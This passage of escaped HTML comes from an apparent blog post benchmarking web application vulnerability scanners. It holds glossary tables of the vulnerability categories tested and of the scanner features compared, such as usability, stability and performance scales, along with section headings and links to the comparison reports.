&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;RFI-LFI&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Directory Traversal / Remote File Include / Local File Include (Will   be separated into different categories in future benchmarks)&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Cmd&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Command Injection / OS Command Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Buffer&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Buffer Overflow&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;CSRF&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Cross Site Request Forgery&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;A-Dos&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Application Denial of Service / RegEx DoS&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Privilege Escalation&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Privilege Escalation Between Different Roles and User Accounts   (Resources / Features)&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Format String&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Format String Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;File Upload&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;File Upload / Insecure File Upload&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Code Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Code Injection (ASP/JSP/PHP/Perl/etc)&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;XML Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;XML / SOAP Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Source Code Disclosure&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Source Code Disclosure Detection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Integer Overflow&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Integer Overflow&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Padding Oracle&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Padding Oracle Detection / Exploitation&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Session Fixation&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Session Fixation&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025804&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;16. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Complementary Scanning Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report compares complementary vulnerability detection features in the tested scanners:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Complementary%20Scan%20Features%20Comparison%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In order to clarify what each column in the report table means, use the following glossary table:&lt;/div&gt;&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: medium none; margin-left: 5.4pt;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Title&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Description&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Web Server Hardening&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Features that are able to detect Insecure HTTP method support (PUT,   Trace, WebDAV), directory listing, robots and cross-domain files information   disclosure, version specific vulnerabilities, etc.&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;CGI Scanning&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Default files, common vulnerable applications, etc.&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Passive Analysis&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Security tests that don’t require any actual attacks, and are instead   based on information gathering and analysis of responses, including   certificate &amp;amp; cipher tests, content &amp;amp; metadata analysis, mime type   analysis, autocomplete detection, insecure transmission of credentials,   google hacking, etc.&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;File / Dir Enumeration&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Directory and file enumeration features&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Notes and Other Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Uncommon or Unique features&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025805&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;17. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Usability and Coverage Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report compares the usability, coverage and scan initiation features of the tested scanners:&lt;br /&gt;
&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%281%20of%203%29%20-%20WAVSEP%20Benchmark%202011%20-%20Final3.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20(1%20of%203)%20-%20WAVSEP%20Benchmark%202011%20-%20Final3.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
In order to clarify what each column in the report table means, use the following glossary table:&lt;/div&gt;&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: medium none; margin-left: 5.4pt;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Title&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Possible Values&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Configuration &amp;amp; Usage Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Very Simple &lt;/b&gt;- GUI + Wizard&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Simple&lt;/b&gt; - GUI with simple options, Command line with scan   configuration file or simple options&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Complex&lt;/b&gt; - GUI with numerous options, Command line with   multiple options&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Very Complex&lt;/b&gt; - Manual scanning feature dependencies, multiple   configuration requirements&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Stability Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Very Stable&lt;/b&gt; - Rarely crashes, Never gets stuck&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Stable&lt;/b&gt; - Rarely crashes, Gets stuck only in extreme scenarios&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Unstable&lt;/b&gt; - Crashes every once in a while, Freezes on a   consistent basis&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Fragile &lt;/b&gt;– Freezes or Crashes on a consistent basis, Fails   performing the operation in many cases&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Performance Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Very Fast&lt;/b&gt; - Fast implementation with limited amount of   scanning tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Fast&lt;/b&gt; - Fast implementation with plenty of scanning tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Slow&lt;/b&gt; - Slow implementation with limited amount of scanning   tasks&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Very Slow&lt;/b&gt; - Slow implementation with plenty of scanning tasks&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025806&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;18. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Connection and Authentication Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report compares the connection, authentication and scan control features of the tested scanners:&lt;br /&gt;
&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20%282%20of%203%29%20-%20WAVSEP%20Benchmark%202011%20-%20Final.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Scanner%20Features%20(2%20of%203)%20-%20WAVSEP%20Benchmark%202011%20-%20Final.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025807&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;19. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Advanced Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 